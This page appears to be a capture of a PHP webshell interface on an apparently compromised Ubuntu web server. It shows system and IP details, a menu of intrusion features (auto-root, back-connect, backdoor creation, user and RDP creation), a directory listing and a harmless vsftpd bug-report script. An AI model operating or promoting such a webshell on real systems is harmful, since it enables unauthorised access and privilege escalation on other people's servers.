Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
bug /
[ HOME SHELL ]
Name
Size
Permission
Action
apache2
[ DIR ]
drwxr-xr-x
apache2-bin
[ DIR ]
drwxr-xr-x
apt
[ DIR ]
drwxr-xr-x
bash-completion
[ DIR ]
drwxr-xr-x
clamav
[ DIR ]
drwxr-xr-x
clamav-base
[ DIR ]
drwxr-xr-x
clamav-freshclam
[ DIR ]
drwxr-xr-x
console-setup
[ DIR ]
drwxr-xr-x
console-setup-linux
[ DIR ]
drwxr-xr-x
cron
[ DIR ]
drwxr-xr-x
dbus
[ DIR ]
drwxr-xr-x
file
[ DIR ]
drwxr-xr-x
grub-common
[ DIR ]
drwxr-xr-x
grub-efi-amd64-bin
[ DIR ]
drwxr-xr-x
grub-pc
[ DIR ]
drwxr-xr-x
grub-pc-bin
[ DIR ]
drwxr-xr-x
grub2-common
[ DIR ]
drwxr-xr-x
init-system-helpers
[ DIR ]
drwxr-xr-x
initramfs-tools
[ DIR ]
drwxr-xr-x
keyboard-configuration
[ DIR ]
drwxr-xr-x
libapache2-mod-php8.3
[ DIR ]
drwxr-xr-x
libmagic1t64
[ DIR ]
drwxr-xr-x
logrotate
[ DIR ]
drwxr-xr-x
man-db
[ DIR ]
drwxr-xr-x
mdadm
[ DIR ]
drwxr-xr-x
media-types
[ DIR ]
drwxr-xr-x
needrestart
[ DIR ]
drwxr-xr-x
php8.3
[ DIR ]
drwxr-xr-x
php8.3-cli
[ DIR ]
drwxr-xr-x
php8.3-common
[ DIR ]
drwxr-xr-x
php8.3-curl
[ DIR ]
drwxr-xr-x
php8.3-fpm
[ DIR ]
drwxr-xr-x
php8.3-gd
[ DIR ]
drwxr-xr-x
php8.3-mbstring
[ DIR ]
drwxr-xr-x
php8.3-mysql
[ DIR ]
drwxr-xr-x
php8.3-opcache
[ DIR ]
drwxr-xr-x
php8.3-readline
[ DIR ]
drwxr-xr-x
php8.3-xml
[ DIR ]
drwxr-xr-x
php8.3-zip
[ DIR ]
drwxr-xr-x
polkitd
[ DIR ]
drwxr-xr-x
procps
[ DIR ]
drwxr-xr-x
systemd
[ DIR ]
drwxr-xr-x
udev
[ DIR ]
drwxr-xr-x
usb-modeswitch-data
[ DIR ]
drwxr-xr-x
usbutils
[ DIR ]
drwxr-xr-x
vim
[ DIR ]
drwxr-xr-x
vim-tiny
[ DIR ]
drwxr-xr-x
cryptsetup
763
B
-rwxr-xr-x
cryptsetup-bin
763
B
-rwxr-xr-x
cryptsetup-initramfs
763
B
-rwxr-xr-x
dpkg
1.18
KB
-rwxr-xr-x
libcryptsetup12
763
B
-rwxr-xr-x
multipath-tools
240
B
-rwxr-xr-x
screen
684
B
-rwxr-xr-x
vsftpd
1.32
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vsftpd
#!/bin/bash cat <<EOF Providing additional information can help diagnose problems with vsftpd. Specifically, this would include: - The system vsftpd log file. - The /etc/vsftpd.conf file. If this information is not relevant for your bug report or you have privacy concerns, please choose no. EOF yesno "Do you want to provide additional information [Y|n]? " yep [ "$REPLY" = yep ] || exit 0 REPORTBUG_VERSION=$(dpkg-query -f '${source:Version}' -W reportbug) LOG_FILE='/var/log/vsftpd.log' CONF_FILE='/etc/vsftpd.conf' # Depending on whether reportbug is new enough, we either write the output of # our various commands to a file and attach them to the report (this needs # reportbug ≥ 6.5.0) or just write them to the body of the bug report. if dpkg --compare-versions "$REPORTBUG_VERSION" ge "6.5.0"; then # We don’t clean up this directory because there is no way to know when # reportbug finished running, and reportbug needs the files around. # Given that those are just a couple of kilobytes in size and people # generally don’t file a lot of bugs, I don’t think it’s a big deal. DIR=$(mktemp -d) echo "-- BEGIN ATTACHMENTS --" >&3 # # attach conf & log # if [ -f ${CONF_FILE} ] ; then cp ${CONF_FILE} ${DIR} echo ${DIR}/vsftpd.conf >&3 fi echo "-- END ATTACHMENTS --" >&3 fi
Close